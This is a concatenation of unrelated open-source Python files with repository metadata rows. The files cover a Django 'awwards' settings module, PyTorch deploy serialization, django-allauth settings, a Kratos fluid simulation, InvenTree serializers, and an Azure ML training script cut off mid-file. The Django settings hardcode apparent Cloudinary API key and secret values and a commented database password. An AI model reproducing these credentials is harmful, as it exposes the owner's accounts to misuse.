#tabu_search(grafo,task,"sdne",seed={"encoder_layer_list":128,"alpha":1e-6, "beta":10, "nu1":1e-8,"nu2": 1e-4},scale={"encoder_layer_list":2,"alpha":10, "beta":5, "nu1":10,"nu2":10},epochs=200, iters=3)
#%%
tabu_search(grafos.B_f,"lp","lap",G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","node2vec",seed={"path_length": 20, "num_paths": 10, "p": 0.1, "q": 0.1},scale={"path_length": 5, "num_paths": 5, "p": 10, "q": 10}, window=4, G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","line",seed={"negative_ratio": 15,"lr":0.001 }, iters=1,epochs=10,G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","gf",G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","sdne",seed={"encoder_layer_list":128,"alpha":1e-6, "beta":10, "nu1":1e-8,"nu2": 1e-4},scale={"encoder_layer_list":2,"alpha":10, "beta":5, "nu1":10,"nu2":10},epochs=200, iters=3,G_test=grafos_test.B_f)
tabu_search(grafos.B_f,"lp","grarep",seed={"kstep": 5}, iters=1,G_test=grafos_test.B_f)
# %%
tabu_search(grafos.B_f,"lp","gae",seed={"hiddens":128,"max_degree":0},scale={"hiddens":2,"max_degree":1},G_test=grafos_test.B_f, epochs=200,iters=1)
tabu_search(grafos.B_f,"lp","vgae",seed={"hiddens":128,"max_degree":0},scale={"hiddens":2,"max_degree":1},G_test=grafos_test.B_f,epochs=200, iters=1)
"""
# %%
| 40.708475 | 230 | 0.568657 |
4a27e34a4fb4adebd3c4077449fe206c39e1a93a | 5,093 | py | Python | awwards/settings.py | abdirahman-ahmednoor/django-awwards | 6502d2eb4dfd3e80943c3d086bb85bb299dd7f18 | [
"MIT"
] | null | null | null | awwards/settings.py | abdirahman-ahmednoor/django-awwards | 6502d2eb4dfd3e80943c3d086bb85bb299dd7f18 | [
"MIT"
] | null | null | null | awwards/settings.py | abdirahman-ahmednoor/django-awwards | 6502d2eb4dfd3e80943c3d086bb85bb299dd7f18 | [
"MIT"
] | null | null | null | """
Django settings for awwards project.
Generated by 'django-admin startproject' using Django 3.2.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import cloudinary
import cloudinary.api
import cloudinary.uploader
import django_heroku
import dj_database_url
from decouple import config,Csv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# SECRET_KEY = 'django-insecure-j=dzdvk!rbxpl2h^ncb85c*lz_9%ak$)ezr7q7g2wlphn*m-+_'
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG = True
# ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myawwards',
'bootstrap4',
'cloudinary',
'rest_framework',
'rest_framework.authtoken',
]
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
)
}
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
ROOT_URLCONF = 'awwards.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
},
},
]
WSGI_APPLICATION = 'awwards.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
MODE=config("MODE", default="dev")
SECRET_KEY = config('SECRET_KEY')
DEBUG = config('DEBUG', default=False, cast=bool)
# development
if config('MODE')=="dev":
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': config('DB_NAME'),
'USER': config('DB_USER'),
'PASSWORD': config('DB_PASSWORD'),
'HOST': config('DB_HOST'),
'PORT': '',
}
}
# production
else:
DATABASES = {
'default': dj_database_url.config(
default=config('DATABASE_URL')
)
}
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql',
# 'NAME': 'awwards',
# 'USER': 'blade',
# 'PASSWORD':'maziwa',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Africa/Nairobi'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
# Configure Django App for Heroku.
django_heroku.settings(locals())
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
cloudinary.config(
cloud_name = 'somken-solution-limited',
api_key = '844774271144255',
api_secret = '8sA1D1HIN1tO3NQrDGeiRdPx5Y4'
)
| 25.852792 | 91 | 0.690752 |
4a27e3753d3d12af47e54d3f15c2fbb9804c37bd | 3,429 | py | Python | torch/_deploy.py | xiaohanhuang/pytorch | a31aea8eaa99a5ff72b5d002c206cd68d5467a5e | [
"Intel"
] | 183 | 2018-04-06T21:10:36.000Z | 2022-03-30T15:05:24.000Z | torch/_deploy.py | xiaohanhuang/pytorch | a31aea8eaa99a5ff72b5d002c206cd68d5467a5e | [
"Intel"
] | 818 | 2020-02-07T02:36:44.000Z | 2022-03-31T23:49:44.000Z | torch/_deploy.py | xiaohanhuang/pytorch | a31aea8eaa99a5ff72b5d002c206cd68d5467a5e | [
"Intel"
] | 58 | 2018-06-05T16:40:18.000Z | 2022-03-16T15:37:29.000Z | import io
import torch
from torch.package._package_pickler import create_pickler
from torch.package._package_unpickler import PackageUnpickler
from torch.package import sys_importer, OrderedImporter, PackageImporter, Importer
from torch.serialization import _maybe_decode_ascii
def _save_storages(importer, obj):
serialized_storages = []
serialized_dtypes = []
importer = importer if isinstance(importer, torch.package.PackageImporter) else None
importers: Importer
if importer is not None:
importers = OrderedImporter(importer, sys_importer)
else:
importers = sys_importer
def persistent_id(obj):
if torch.is_storage(obj) or isinstance(obj, torch.storage.TypedStorage):
if isinstance(obj, torch.storage.TypedStorage):
# TODO: Once we decide to break serialization FC, we can
# remove this case
storage = obj._storage
dtype = obj.dtype
else:
storage = obj
dtype = torch.uint8
serialized_storages.append(obj)
serialized_dtypes.append(dtype)
return ('storage', len(serialized_storages) - 1)
if hasattr(obj, "__reduce_deploy__"):
if _serialized_reduces.get(id(obj)) is None:
_serialized_reduces[id(obj)] = (
"reduce_deploy",
id(obj),
*obj.__reduce_deploy__(importers),
)
return _serialized_reduces[id(obj)]
return None
# Write the pickle data for `obj`
data_buf = io.BytesIO()
pickler = create_pickler(data_buf, importers)
pickler.persistent_id = persistent_id
pickler.dump(obj)
data_value = data_buf.getvalue()
return data_value, serialized_storages, serialized_dtypes, importer.zip_reader if importer else None
def _load_storages(id, zip_reader, obj_bytes, serialized_storages, serialized_dtypes):
def persistent_load(saved_id):
assert isinstance(saved_id, tuple)
typename = _maybe_decode_ascii(saved_id[0])
data = saved_id[1:]
if typename == 'storage':
# TODO: Once we decide to break serialization FC, we can
# stop wrapping with TypedStorage
storage = serialized_storages[data[0]]
dtype = serialized_dtypes[data[0]]
return torch.storage.TypedStorage(
wrap_storage=storage._untyped(),
dtype=dtype)
if typename == 'reduce_deploy':
reduce_id, func, args = data
if reduce_id not in _loaded_reduces:
_loaded_reduces[reduce_id] = func(_raw_packages[zip_reader], *args)
return _loaded_reduces[reduce_id]
return None
importer: Importer
if zip_reader is not None:
importer = OrderedImporter(_get_package(zip_reader), sys_importer)
else:
importer = sys_importer
unpickler = PackageUnpickler(importer, io.BytesIO(obj_bytes))
unpickler.persistent_load = persistent_load
result = _deploy_objects[id] = unpickler.load()
return result
def _get_package(zip_reader):
if zip_reader not in _raw_packages:
_raw_packages[zip_reader] = PackageImporter(zip_reader)
return _raw_packages[zip_reader]
_raw_packages: dict = {}
_deploy_objects: dict = {}
_serialized_reduces: dict = {}
_loaded_reduces: dict = {}
| 34.636364 | 104 | 0.657334 |
4a27e396af3f46aea4bdd5c6e868758680795ec8 | 10,256 | py | Python | allauth/account/app_settings.py | chidg/django-allauth | 69fe36a5cc542b016d046d716c287ee4b2383797 | [
"MIT"
] | null | null | null | allauth/account/app_settings.py | chidg/django-allauth | 69fe36a5cc542b016d046d716c287ee4b2383797 | [
"MIT"
] | null | null | null | allauth/account/app_settings.py | chidg/django-allauth | 69fe36a5cc542b016d046d716c287ee4b2383797 | [
"MIT"
] | null | null | null | class AppSettings(object):
class AuthenticationMethod:
USERNAME = 'username'
EMAIL = 'email'
USERNAME_EMAIL = 'username_email'
class EmailVerificationMethod:
# After signing up, keep the user account inactive until the email
# address is verified
MANDATORY = 'mandatory'
# Allow login with unverified email (email verification is
# still sent)
OPTIONAL = 'optional'
# Don't send email verification mails during signup
NONE = 'none'
def __init__(self, prefix):
self.prefix = prefix
# If login is by email, email must be required
assert (not self.AUTHENTICATION_METHOD ==
self.AuthenticationMethod.EMAIL) or self.EMAIL_REQUIRED
# If login includes email, login must be unique
assert (self.AUTHENTICATION_METHOD ==
self.AuthenticationMethod.USERNAME) or self.UNIQUE_EMAIL
assert (self.EMAIL_VERIFICATION !=
self.EmailVerificationMethod.MANDATORY) \
or self.EMAIL_REQUIRED
if not self.USER_MODEL_USERNAME_FIELD:
assert not self.USERNAME_REQUIRED
assert self.AUTHENTICATION_METHOD \
not in (self.AuthenticationMethod.USERNAME,
self.AuthenticationMethod.USERNAME_EMAIL)
def _setting(self, name, dflt):
from django.conf import settings
getter = getattr(settings,
'ALLAUTH_SETTING_GETTER',
lambda name, dflt: getattr(settings, name, dflt))
return getter(self.prefix + name, dflt)
@property
def DEFAULT_HTTP_PROTOCOL(self):
return self._setting("DEFAULT_HTTP_PROTOCOL", "http").lower()
@property
def EMAIL_CONFIRMATION_EXPIRE_DAYS(self):
"""
Determines the expiration date of email confirmation mails (#
of days)
"""
from django.conf import settings
return self._setting("EMAIL_CONFIRMATION_EXPIRE_DAYS",
getattr(settings, "EMAIL_CONFIRMATION_DAYS", 3))
@property
def EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL(self):
"""
The URL to redirect to after a successful email confirmation, in
case of an authenticated user
"""
return self._setting("EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL",
None)
@property
def EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL(self):
"""
The URL to redirect to after a successful email confirmation, in
case no user is logged in
"""
from django.conf import settings
return self._setting("EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL",
settings.LOGIN_URL)
@property
def EMAIL_CONFIRMATION_COOLDOWN(self):
"""
The cooldown in seconds during which, after an email confirmation has
been sent, a second confirmation email will not be sent.
"""
return self._setting("EMAIL_CONFIRMATION_COOLDOWN", 3 * 60)
@property
def EMAIL_REQUIRED(self):
"""
The user is required to hand over an email address when signing up
"""
return self._setting("EMAIL_REQUIRED", False)
@property
def EMAIL_VERIFICATION(self):
"""
See email verification method
"""
ret = self._setting("EMAIL_VERIFICATION",
self.EmailVerificationMethod.OPTIONAL)
# Deal with legacy (boolean based) setting
if ret is True:
ret = self.EmailVerificationMethod.MANDATORY
elif ret is False:
ret = self.EmailVerificationMethod.OPTIONAL
return ret
@property
def AUTHENTICATION_METHOD(self):
ret = self._setting("AUTHENTICATION_METHOD",
self.AuthenticationMethod.USERNAME)
return ret
@property
def EMAIL_MAX_LENGTH(self):
"""
Adjust max_length of email addresses
"""
return self._setting("EMAIL_MAX_LENGTH", 254)
@property
def UNIQUE_EMAIL(self):
"""
Enforce uniqueness of email addresses
"""
return self._setting("UNIQUE_EMAIL", True)
@property
def SIGNUP_EMAIL_ENTER_TWICE(self):
"""
Signup email verification
"""
return self._setting("SIGNUP_EMAIL_ENTER_TWICE", False)
@property
def SIGNUP_PASSWORD_ENTER_TWICE(self):
"""
Signup password verification
"""
legacy = self._setting('SIGNUP_PASSWORD_VERIFICATION', True)
return self._setting('SIGNUP_PASSWORD_ENTER_TWICE', legacy)
@property
def PASSWORD_MIN_LENGTH(self):
"""
Minimum password Length
"""
from django.conf import settings
ret = None
if not settings.AUTH_PASSWORD_VALIDATORS:
ret = self._setting("PASSWORD_MIN_LENGTH", 6)
return ret
@property
def EMAIL_SUBJECT_PREFIX(self):
"""
Subject-line prefix to use for email messages sent
"""
return self._setting("EMAIL_SUBJECT_PREFIX", None)
@property
def SIGNUP_FORM_CLASS(self):
"""
Signup form
"""
return self._setting("SIGNUP_FORM_CLASS", None)
@property
def USERNAME_REQUIRED(self):
"""
The user is required to enter a username when signing up
"""
return self._setting("USERNAME_REQUIRED", True)
@property
def USERNAME_MIN_LENGTH(self):
"""
Minimum username Length
"""
return self._setting("USERNAME_MIN_LENGTH", 1)
@property
def USERNAME_BLACKLIST(self):
"""
List of usernames that are not allowed
"""
return self._setting("USERNAME_BLACKLIST", [])
@property
def PASSWORD_INPUT_RENDER_VALUE(self):
"""
render_value parameter as passed to PasswordInput fields
"""
return self._setting("PASSWORD_INPUT_RENDER_VALUE", False)
@property
def ADAPTER(self):
return self._setting('ADAPTER',
'allauth.account.adapter.DefaultAccountAdapter')
@property
def CONFIRM_EMAIL_ON_GET(self):
return self._setting('CONFIRM_EMAIL_ON_GET', False)
@property
def AUTHENTICATED_LOGIN_REDIRECTS(self):
return self._setting('AUTHENTICATED_LOGIN_REDIRECTS', True)
@property
def LOGIN_ON_EMAIL_CONFIRMATION(self):
"""
Automatically log the user in once they confirmed their email address
"""
return self._setting('LOGIN_ON_EMAIL_CONFIRMATION', False)
@property
def LOGIN_ON_PASSWORD_RESET(self):
"""
Automatically log the user in immediately after resetting
their password.
"""
return self._setting('LOGIN_ON_PASSWORD_RESET', False)
@property
def LOGOUT_REDIRECT_URL(self):
return self._setting('LOGOUT_REDIRECT_URL', '/')
@property
def LOGOUT_ON_GET(self):
return self._setting('LOGOUT_ON_GET', False)
@property
def LOGOUT_ON_PASSWORD_CHANGE(self):
return self._setting('LOGOUT_ON_PASSWORD_CHANGE', False)
@property
def USER_MODEL_USERNAME_FIELD(self):
return self._setting('USER_MODEL_USERNAME_FIELD', 'username')
@property
def USER_MODEL_EMAIL_FIELD(self):
return self._setting('USER_MODEL_EMAIL_FIELD', 'email')
@property
def SESSION_COOKIE_AGE(self):
"""
Deprecated -- use Django's settings.SESSION_COOKIE_AGE instead
"""
from django.conf import settings
return self._setting('SESSION_COOKIE_AGE', settings.SESSION_COOKIE_AGE)
@property
def SESSION_REMEMBER(self):
"""
Controls the life time of the session. Set to `None` to ask the user
("Remember me?"), `False` to not remember, and `True` to always
remember.
"""
return self._setting('SESSION_REMEMBER', None)
@property
def TEMPLATE_EXTENSION(self):
"""
A string defining the template extension to use, defaults to `html`.
"""
return self._setting('TEMPLATE_EXTENSION', 'html')
@property
def FORMS(self):
return self._setting('FORMS', {})
@property
def LOGIN_ATTEMPTS_LIMIT(self):
"""
Number of failed login attempts. When this number is
exceeded, the user is prohibited from logging in for the
specified `LOGIN_ATTEMPTS_TIMEOUT`
"""
return self._setting('LOGIN_ATTEMPTS_LIMIT', 5)
@property
def LOGIN_ATTEMPTS_TIMEOUT(self):
"""
Time period from last unsuccessful login attempt, during
which the user is prohibited from trying to log in. Defaults to
5 minutes.
"""
return self._setting('LOGIN_ATTEMPTS_TIMEOUT', 60 * 5)
@property
def EMAIL_CONFIRMATION_HMAC(self):
return self._setting('EMAIL_CONFIRMATION_HMAC', True)
@property
def SALT(self):
return self._setting('SALT', 'account')
@property
def PRESERVE_USERNAME_CASING(self):
return self._setting('PRESERVE_USERNAME_CASING', True)
@property
def USERNAME_VALIDATORS(self):
from django.core.exceptions import ImproperlyConfigured
from allauth.utils import import_attribute
from allauth.utils import get_user_model
path = self._setting('USERNAME_VALIDATORS', None)
if path:
ret = import_attribute(path)
if not isinstance(ret, list):
raise ImproperlyConfigured(
'ACCOUNT_USERNAME_VALIDATORS is expected to be a list')
else:
if self.USER_MODEL_USERNAME_FIELD is not None:
ret = get_user_model()._meta.get_field(
self.USER_MODEL_USERNAME_FIELD).validators
else:
ret = []
return ret
# Ugly? Guido recommends this himself ...
# http://mail.python.org/pipermail/python-ideas/2012-May/014969.html
import sys # noqa
app_settings = AppSettings('ACCOUNT_')
app_settings.__name__ = __name__
sys.modules[__name__] = app_settings
| 31.363914 | 79 | 0.63046 |
4a27e3e1b22bcab46c535f74fbe4c005647a1005 | 8,869 | py | Python | applications/incompressible_fluid_application/test_examples/StillWater_Edgebased.gid/StillWater_Edgebased_script.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | 2 | 2019-10-25T09:28:10.000Z | 2019-11-21T12:51:46.000Z | applications/incompressible_fluid_application/test_examples/StillWater_Edgebased.gid/StillWater_Edgebased_script.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | 13 | 2019-10-07T12:06:51.000Z | 2020-02-18T08:48:33.000Z | applications/incompressible_fluid_application/test_examples/StillWater_Edgebased.gid/StillWater_Edgebased_script.py | lcirrott/Kratos | 8406e73e0ad214c4f89df4e75e9b29d0eb4a47ea | [
"BSD-4-Clause"
] | 1 | 2020-06-12T08:51:24.000Z | 2020-06-12T08:51:24.000Z | from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
import edgebased_levelset_var
#
#
# setting the domain size for the problem to be solved
domain_size = edgebased_levelset_var.domain_size
import math
# import cProfile
#
#
# ATTENTION: here the order is important
# including kratos path
kratos_path = '../../../..'
kratos_benchmarking_path = '../../../../benchmarking'
import sys
sys.path.append(kratos_path)
sys.path.append(kratos_benchmarking_path)
import benchmarking
# from now on the order is not anymore crucial
#
#
from KratosMultiphysics import *
from KratosMultiphysics.IncompressibleFluidApplication import *
from KratosMultiphysics.MeshingApplication import *
#
#
def NodeFinder(node_list, X, Y, Z):
for node in node_list:
if((node.X - X) ** 2 + (node.Y - Y) ** 2 + (node.Z - Z) ** 2 < .000001):
return node
def BenchmarkCheck(time, node1):
benchmarking.Output(time, "Time")
benchmarking.Output(
node1.GetSolutionStepValue(PRESSURE),
"Node 1 pressure",
0.05)
benchmarking.Output(
node1.GetSolutionStepValue(DISTANCE),
"Node 1 distance",
0.05)
# defining a model part for the fluid and one for the structure
fluid_model_part = ModelPart("FluidPart")
# importing the solvers needed
import edgebased_levelset_solver
edgebased_levelset_solver.AddVariables(fluid_model_part)
# introducing input file name
input_file_name = edgebased_levelset_var.problem_name
# reading the fluid part
gid_mode = GiDPostMode.GiD_PostBinary
multifile = MultiFileFlag.MultipleFiles
deformed_mesh_flag = WriteDeformedMeshFlag.WriteUndeformed
write_conditions = WriteConditionsFlag.WriteConditions
# selecting output format
if(edgebased_levelset_var.print_layers):
gid_io = EdgebasedGidIO(
input_file_name,
gid_mode,
multifile,
deformed_mesh_flag,
write_conditions)
else:
gid_io = GidIO(
input_file_name,
gid_mode,
multifile,
deformed_mesh_flag,
write_conditions)
model_part_io_fluid = ModelPartIO(input_file_name)
model_part_io_fluid.ReadModelPart(fluid_model_part)
# setting up the buffer size: SHOULD BE DONE AFTER READING!!!
fluid_model_part.SetBufferSize(2)
# adding dofs
edgebased_levelset_solver.AddDofs(fluid_model_part)
# we assume here that all of the internal nodes are marked with a negative distance
# set the distance of all of the internal nodes to a small value
small_value = 0.0001
n_active = 0
for node in fluid_model_part.Nodes:
dist = node.GetSolutionStepValue(DISTANCE)
node.SetSolutionStepValue(DISTANCE, 0, node.Y - 5.0)
# make sure that the porosity is not zero on any node (set by default to
# fluid only)
for node in fluid_model_part.Nodes:
if(node.GetSolutionStepValue(POROSITY) == 0.0):
node.SetSolutionStepValue(POROSITY, 0, 1.0)
if(node.GetSolutionStepValue(DIAMETER) == 0.0):
node.SetSolutionStepValue(DIAMETER, 0, 1.0)
# constructing the solver
body_force = Vector(3)
body_force[0] = edgebased_levelset_var.body_force_x
body_force[1] = edgebased_levelset_var.body_force_y
body_force[2] = edgebased_levelset_var.body_force_z
if(body_force[0] == 0.0 and body_force[1] == 0.0 and body_force[2] == 0.0):
raise "ERROR. Body Force cannot be a ZERO VECTOR"
viscosity = edgebased_levelset_var.viscosity
density = edgebased_levelset_var.density
fluid_solver = edgebased_levelset_solver.EdgeBasedLevelSetSolver(
fluid_model_part, domain_size, body_force, viscosity, density)
fluid_solver.redistance_frequency = edgebased_levelset_var.redistance_frequency
fluid_solver.extrapolation_layers = int(
edgebased_levelset_var.extrapolation_layers)
fluid_solver.stabdt_pressure_factor = edgebased_levelset_var.stabdt_pressure_factor
fluid_solver.stabdt_convection_factor = edgebased_levelset_var.stabdt_convection_factor
fluid_solver.use_mass_correction = edgebased_levelset_var.use_mass_correction
fluid_solver.tau2_factor = edgebased_levelset_var.tau2_factor
fluid_solver.edge_detection_angle = edgebased_levelset_var.edge_detection_angle
fluid_solver.assume_constant_pressure = edgebased_levelset_var.assume_constant_pressure
# 0 = None; 1 = Ergun; 2 = Custom;
fluid_solver.compute_porous_resistance_law = int(
edgebased_levelset_var.compute_porous_resistance_law)
# print "compute_porous_resistance_law ", fluid_solver.compute_porous_resistance_law
fluid_solver.dynamic_tau = 1.0
fluid_solver.Initialize()
if(edgebased_levelset_var.wall_law_y > 1e-10):
fluid_solver.fluid_solver.ActivateWallResistance(
edgebased_levelset_var.wall_law_y)
#
print("fluid solver created")
# settings to be changed
max_Dt = edgebased_levelset_var.max_time_step
initial_Dt = 0.001 * max_Dt
final_time = edgebased_levelset_var.max_time
output_dt = edgebased_levelset_var.output_dt
safety_factor = edgebased_levelset_var.safety_factor
number_of_inital_steps = edgebased_levelset_var.number_of_inital_steps
initial_time_step = edgebased_levelset_var.initial_time_step
out = 0
original_max_dt = max_Dt
#
back_node = NodeFinder(fluid_model_part.Nodes, 4.804, 2.0, 0.0)
print(back_node)
#
# mesh to be printed
if(edgebased_levelset_var.print_layers == False):
mesh_name = 0.0
gid_io.InitializeMesh(mesh_name)
gid_io.WriteMesh(fluid_model_part.GetMesh())
gid_io.FinalizeMesh()
gid_io.Flush()
gid_io.InitializeResults(mesh_name, (fluid_model_part).GetMesh())
max_safety_factor = safety_factor
time = 0.0
step = 0
next_output_time = output_dt
while(time < final_time):
if(step < number_of_inital_steps):
max_Dt = initial_time_step
else:
max_Dt = original_max_dt
# progressively increment the safety factor
# in the steps that follow a reduction of it
safety_factor = safety_factor * 1.2
if(safety_factor > max_safety_factor):
safety_factor = max_safety_factor
Dt = fluid_solver.EstimateTimeStep(safety_factor, max_Dt)
time = time + Dt
fluid_model_part.CloneTimeStep(time)
print("******** CURRENT TIME = ", time)
if(step >= 3):
fluid_solver.Solve()
BenchmarkCheck(time, back_node)
check_dt = fluid_solver.EstimateTimeStep(0.95, max_Dt)
if(check_dt < Dt):
print("***********************************************************")
print("***********************************************************")
print("***********************************************************")
print(" *** REDUCING THE TIME STEP ***")
print("***********************************************************")
print("***********************************************************")
print("***********************************************************")
# we found a velocity too large! we need to reduce the time step
# this is to set the database to the value at the beginning of the
# step
fluid_solver.fluid_solver.ReduceTimeStep(fluid_model_part, time)
safety_factor *= edgebased_levelset_var.reduction_on_failure
reduced_dt = fluid_solver.EstimateTimeStep(safety_factor, max_Dt)
print("time before reduction= ", time)
time = time - Dt + reduced_dt
print("reduced time = ", time)
print("Dt = ", Dt)
print("reduced_dt = ", reduced_dt)
# this is to set the database to the value at the beginning of the
# step
fluid_solver.fluid_solver.ReduceTimeStep(fluid_model_part, time)
fluid_solver.Solve()
if(time >= next_output_time):
if(edgebased_levelset_var.print_layers):
# writing mesh
gid_io.InitializeMesh(time)
gid_io.WriteMesh((fluid_model_part).GetMesh())
gid_io.FinalizeMesh()
gid_io.InitializeResults(time, (fluid_model_part).GetMesh())
gid_io.WriteNodalResults(PRESSURE, fluid_model_part.Nodes, time, 0)
gid_io.WriteNodalResults(POROSITY, fluid_model_part.Nodes, time, 0)
gid_io.WriteNodalResults(VELOCITY, fluid_model_part.Nodes, time, 0)
gid_io.WriteNodalResults(DISTANCE, fluid_model_part.Nodes, time, 0)
gid_io.WriteNodalResults(PRESS_PROJ, fluid_model_part.Nodes, time, 0)
# gid_io.WriteNodalResults(LIN_DARCY_COEF,fluid_model_part.Nodes,time,0)
# gid_io.WriteNodalResults(NONLIN_DARCY_COEF,fluid_model_part.Nodes,time,0)
gid_io.Flush()
if(edgebased_levelset_var.print_layers):
gid_io.FinalizeResults()
next_output_time = time + output_dt
out = 0
out = out + 1
step = step + 1
if(edgebased_levelset_var.print_layers == False):
gid_io.FinalizeResults()
| 33.467925 | 134 | 0.700755 |
4a27e3f30e68df4070b8924c9feda6e3a58dc632 | 1,831 | py | Python | InvenTree/common/serializers.py | andytorrestb/InvenTree | a24ad197414b7ec35cd602dc9190e86de5f66ad3 | [
"MIT"
] | 1 | 2021-11-18T12:32:03.000Z | 2021-11-18T12:32:03.000Z | InvenTree/common/serializers.py | andytorrestb/InvenTree | a24ad197414b7ec35cd602dc9190e86de5f66ad3 | [
"MIT"
] | null | null | null | InvenTree/common/serializers.py | andytorrestb/InvenTree | a24ad197414b7ec35cd602dc9190e86de5f66ad3 | [
"MIT"
] | null | null | null | """
JSON serializers for common components
"""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from InvenTree.serializers import InvenTreeModelSerializer
from rest_framework import serializers
from common.models import InvenTreeSetting, InvenTreeUserSetting
class SettingsSerializer(InvenTreeModelSerializer):
"""
Base serializer for a settings object
"""
key = serializers.CharField(read_only=True)
name = serializers.CharField(read_only=True)
description = serializers.CharField(read_only=True)
type = serializers.CharField(source='setting_type', read_only=True)
choices = serializers.SerializerMethodField()
def get_choices(self, obj):
"""
Returns the choices available for a given item
"""
results = []
choices = obj.choices()
if choices:
for choice in choices:
results.append({
'value': choice[0],
'display_name': choice[1],
})
return results
class GlobalSettingsSerializer(SettingsSerializer):
"""
Serializer for the InvenTreeSetting model
"""
class Meta:
model = InvenTreeSetting
fields = [
'pk',
'key',
'value',
'name',
'description',
'type',
'choices',
]
class UserSettingsSerializer(SettingsSerializer):
"""
Serializer for the InvenTreeUserSetting model
"""
user = serializers.PrimaryKeyRelatedField(read_only=True)
class Meta:
model = InvenTreeUserSetting
fields = [
'pk',
'key',
'value',
'name',
'description',
'user',
'type',
'choices',
]
| 21.290698 | 71 | 0.57728 |
4a27e439cf3ecc1f0918ad3b51bf5141028f20d7 | 2,299 | py | Python | scripts/diabetes_training_file.py | rohitashwachaks/dp100 | 7223e75688b0982f757f2a92ecb7b86a71c3f20b | [
"MIT"
] | null | null | null | scripts/diabetes_training_file.py | rohitashwachaks/dp100 | 7223e75688b0982f757f2a92ecb7b86a71c3f20b | [
"MIT"
] | null | null | null | scripts/diabetes_training_file.py | rohitashwachaks/dp100 | 7223e75688b0982f757f2a92ecb7b86a71c3f20b | [
"MIT"
] | null | null | null | # Import libraries
import os
import argparse
from azureml.core import Dataset, Run
import pandas as pd
import numpy as np
import joblib
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
import glob
# Get script arguments (rgularization rate and file dataset mount point)
parser = argparse.ArgumentParser()
parser.add_argument('--regularization', type=float, dest='reg_rate', default=0.01, help='regularization rate')
parser.add_argument('--input-data', type=str, dest='dataset_folder', help='data mount point')
args = parser.parse_args()
# Set regularization hyperparameter (passed as an argument to the script)
reg = args.reg_rate
# Get the experiment run context
run = Run.get_context()
# load the diabetes dataset
print("Loading Data...")
data_path = run.input_datasets['training_files'] # Get the training data path from the input
# (You could also just use args.dataset_folder if you don't want to rely on a hard-coded friendly name)
# Read the files
all_files = glob.glob(data_path + "/*.csv")
diabetes = pd.concat((pd.read_csv(f) for f in all_files), sort=False)
# Separate features and labels
X, y = diabetes[['Pregnancies','PlasmaGlucose','DiastolicBloodPressure','TricepsThickness','SerumInsulin','BMI','DiabetesPedigree','Age']].values, diabetes['Diabetic'].values
# Split data into training set and test set
